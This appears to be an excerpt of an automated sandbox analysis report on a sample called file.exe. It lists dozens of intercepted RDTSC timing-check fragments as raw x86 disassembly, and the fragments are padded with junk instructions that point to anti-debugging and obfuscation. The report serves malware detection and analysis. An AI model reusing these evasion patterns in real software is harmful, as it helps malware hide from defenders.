                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E1C second address: 4CA0E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E20 second address: 4CA0E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD4A4ED866Bh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E37 second address: 4CA0E99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD5173671A8h 0x0000000f pushad 0x00000010 mov si, A873h 0x00000014 mov ah, 58h 0x00000016 popad 0x00000017 mov ecx, eax 0x00000019 jmp 00007FD4A4C5469Bh 0x0000001e xor eax, dword ptr [ebp+08h] 0x00000021 pushad 0x00000022 mov eax, ebx 0x00000024 mov ebx, 0913DF24h 0x00000029 popad 0x0000002a and ecx, 1Fh 0x0000002d jmp 00007FD4A4C546A3h 0x00000032 ror eax, cl 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E99 second address: 4CA0E9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0E9F second address: 4CA0F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD4A4C5469Ch 0x00000012 adc si, E838h 0x00000017 jmp 00007FD4A4C5469Bh 0x0000001c popfd 0x0000001d mov ch, DEh 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007FD4A4C546A5h 0x00000026 sbb eax, 596B76D6h 0x0000002c jmp 00007FD4A4C546A1h 0x00000031 popfd 0x00000032 popad 0x00000033 retn 0004h 0x00000036 nop 0x00000037 mov esi, eax 0x00000039 lea eax, dword ptr [ebp-08h] 0x0000003c xor esi, dword ptr [00D52014h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push eax 0x00000045 lea eax, dword ptr [ebp-10h] 0x00000048 push eax 0x00000049 call 00007FD4A8BE55A9h 0x0000004e push FFFFFFFEh 0x00000050 jmp 00007FD4A4C5469Eh 0x00000055 pop eax 0x00000056 pushad 0x00000057 push ecx 0x00000058 mov ebx, 7F700310h 0x0000005d pop edi 0x0000005e push eax 0x0000005f push edx 0x00000060 mov edx, eax 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F20 second address: 4CA0F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ret 0x00000006 nop 0x00000007 push eax 0x00000008 call 00007FD4A8E69595h 0x0000000d mov edi, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD4A4ED8678h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F42 second address: 4CA0F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD4A4C546A1h 0x00000009 or cx, EAF6h 0x0000000e jmp 00007FD4A4C546A1h 0x00000013 popfd 0x00000014 mov eax, 02ADC3E7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F7D second address: 4CA0F81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0F81 second address: 4CA0F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60042 second address: 4C60071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD4A4ED8671h 0x0000000a xor eax, 6C6DA9C6h 0x00000010 jmp 00007FD4A4ED8671h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60071 second address: 4C60077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60077 second address: 4C6007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6007B second address: 4C6012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 747AE268h 0x00000010 movsx edi, si 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FD4A4C546A6h 0x0000001e or ax, B4C8h 0x00000023 jmp 00007FD4A4C5469Bh 0x00000028 popfd 0x00000029 movzx ecx, dx 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f push esi 0x00000030 mov dx, B610h 0x00000034 pop edx 0x00000035 popad 0x00000036 mov dword ptr [esp], ecx 0x00000039 jmp 00007FD4A4C5469Bh 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 call 00007FD4A4C546A4h 0x00000045 push esi 0x00000046 pop ebx 0x00000047 pop esi 0x00000048 pushfd 0x00000049 jmp 00007FD4A4C546A7h 0x0000004e sbb si, CDCEh 0x00000053 jmp 00007FD4A4C546A9h 0x00000058 popfd 0x00000059 popad 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e mov eax, edi 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6012D second address: 4C6019C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD4A4ED8679h 0x00000008 xor cl, FFFFFFB6h 0x0000000b jmp 00007FD4A4ED8671h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov dx, si 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FD4A4ED866Ah 0x0000001d mov ebx, dword ptr [ebp+10h] 0x00000020 jmp 00007FD4A4ED8670h 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b jmp 00007FD4A4ED8673h 0x00000030 popad 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6019C second address: 4C601DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FD4A4C5469Bh 0x0000000b add cl, FFFFFFFEh 0x0000000e jmp 00007FD4A4C546A9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD4A4C5469Ch 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601DC second address: 4C601F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601F3 second address: 4C601F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601F8 second address: 4C60217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60217 second address: 4C6021C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6021C second address: 4C60231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60231 second address: 4C60235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60235 second address: 4C60252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60252 second address: 4C60276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD4A4C5469Ch 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60276 second address: 4C6027C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6027C second address: 4C60280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60280 second address: 4C60284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60284 second address: 4C60364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007FD4A4C546A9h 0x0000000e test esi, esi 0x00000010 jmp 00007FD4A4C5469Eh 0x00000015 je 00007FD5173A29F5h 0x0000001b pushad 0x0000001c movzx ecx, bx 0x0000001f call 00007FD4A4C546A3h 0x00000024 call 00007FD4A4C546A8h 0x00000029 pop eax 0x0000002a pop edi 0x0000002b popad 0x0000002c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000033 jmp 00007FD4A4C5469Eh 0x00000038 je 00007FD5173A29BEh 0x0000003e pushad 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 movzx ecx, bx 0x00000045 popad 0x00000046 mov esi, edx 0x00000048 popad 0x00000049 mov edx, dword ptr [esi+44h] 0x0000004c jmp 00007FD4A4C546A1h 0x00000051 or edx, dword ptr [ebp+0Ch] 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007FD4A4C5469Ch 0x0000005b add ecx, 17BBE058h 0x00000061 jmp 00007FD4A4C5469Bh 0x00000066 popfd 0x00000067 popad 0x00000068 test edx, 61000000h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FD4A4C546A0h 0x00000075 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60364 second address: 4C603C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD4A4ED8671h 0x00000009 xor cx, DEA6h 0x0000000e jmp 00007FD4A4ED8671h 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007FD517626958h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD4A4ED8674h 0x00000029 sbb si, 8F78h 0x0000002e jmp 00007FD4A4ED866Bh 0x00000033 popfd 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C603C8 second address: 4C603DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C603DE second address: 4C6043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f pushad 0x00000010 mov di, ax 0x00000013 pushfd 0x00000014 jmp 00007FD4A4ED8670h 0x00000019 jmp 00007FD4A4ED8675h 0x0000001e popfd 0x0000001f popad 0x00000020 jne 00007FD5176268E8h 0x00000026 jmp 00007FD4A4ED866Eh 0x0000002b test bl, 00000007h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6043C second address: 4C60459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60459 second address: 4C60469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED866Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C508A1 second address: 4C508A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C508A7 second address: 4C508AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C508AD second address: 4C508B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C508B1 second address: 4C508D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8678h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 3584990Dh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C508D9 second address: 4C508F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, di 0x0000000d mov edx, 596CF740h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx esi, dx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C509E6 second address: 4C50A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FD4A4ED866Eh 0x00000015 mov ecx, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD4A4ED8677h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50A33 second address: 4C50A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD5173A9FE9h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ecx, edx 0x00000014 mov si, bx 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50A5F second address: 4C50AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 jmp 00007FD4A4ED866Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test byte ptr [77436968h], 00000002h 0x00000014 jmp 00007FD4A4ED8670h 0x00000019 jne 00007FD51762DF94h 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD4A4ED866Dh 0x00000026 or al, 00000016h 0x00000029 jmp 00007FD4A4ED8671h 0x0000002e popfd 0x0000002f popad 0x00000030 mov edx, dword ptr [ebp+0Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FD4A4ED866Dh 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50AC5 second address: 4C50B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD4A4C546A7h 0x00000009 sbb eax, 09ABFAFEh 0x0000000f jmp 00007FD4A4C546A9h 0x00000014 popfd 0x00000015 mov dx, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B0D second address: 4C50B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B1C second address: 4C50B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ECh 0x00000005 mov eax, 7ABF2927h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 mov ebx, 178F0D6Ch 0x00000015 call 00007FD4A4C546A5h 0x0000001a pop esi 0x0000001b popad 0x0000001c movsx ebx, ax 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD4A4C5469Fh 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50B5E second address: 4C50B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD4A4ED8673h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BF0 second address: 4C50BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BF6 second address: 4C50BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BFB second address: 4C50C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6F81h 0x00000007 movzx eax, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD4A4C5469Fh 0x00000015 adc cl, FFFFFFAEh 0x00000018 jmp 00007FD4A4C546A9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FD4A4C546A0h 0x00000024 add esi, 39546428h 0x0000002a jmp 00007FD4A4C5469Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov esp, ebp 0x00000033 jmp 00007FD4A4C546A6h 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD4A4C546A7h 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50C8D second address: 4C50CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED8674h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50CA5 second address: 4C50CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60E1D second address: 4C60E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop edi 0x0000000d push esi 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60E2D second address: 4C60E54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push ecx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD4A4C546A9h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60E54 second address: 4C60E5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60E5A second address: 4C60E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60B51 second address: 4C60B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60B55 second address: 4C60B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60B5B second address: 4C60BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD4A4ED866Ch 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD4A4ED866Bh 0x0000000f xor ch, FFFFFFEEh 0x00000012 jmp 00007FD4A4ED8679h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD4A4ED866Dh 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60BA7 second address: 4C60C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007FD4A4C546A3h 0x0000000b or ax, 78AEh 0x00000010 jmp 00007FD4A4C546A9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007FD4A4C546A1h 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD4A4C546A8h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60C11 second address: 4C60C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60C15 second address: 4C60C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60C1B second address: 4C60C57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 jmp 00007FD4A4ED8679h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007FD4A4ED866Eh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx ebx, si 0x0000001c mov edi, ecx 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0B7C second address: 4CD0B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0B82 second address: 4CD0B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0B86 second address: 4CD0BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, 3Ah 0x0000000c mov ch, bl 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FD4A4C5469Ah 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD4A4C546A0h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD4A4C5469Ah 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0BC1 second address: 4CD0BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0BC7 second address: 4CD0BCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0EA1 second address: 4CC0EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 55h 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD4A4ED8673h 0x00000015 adc esi, 2BBA92AEh 0x0000001b jmp 00007FD4A4ED8679h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0EE6 second address: 4CC0EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
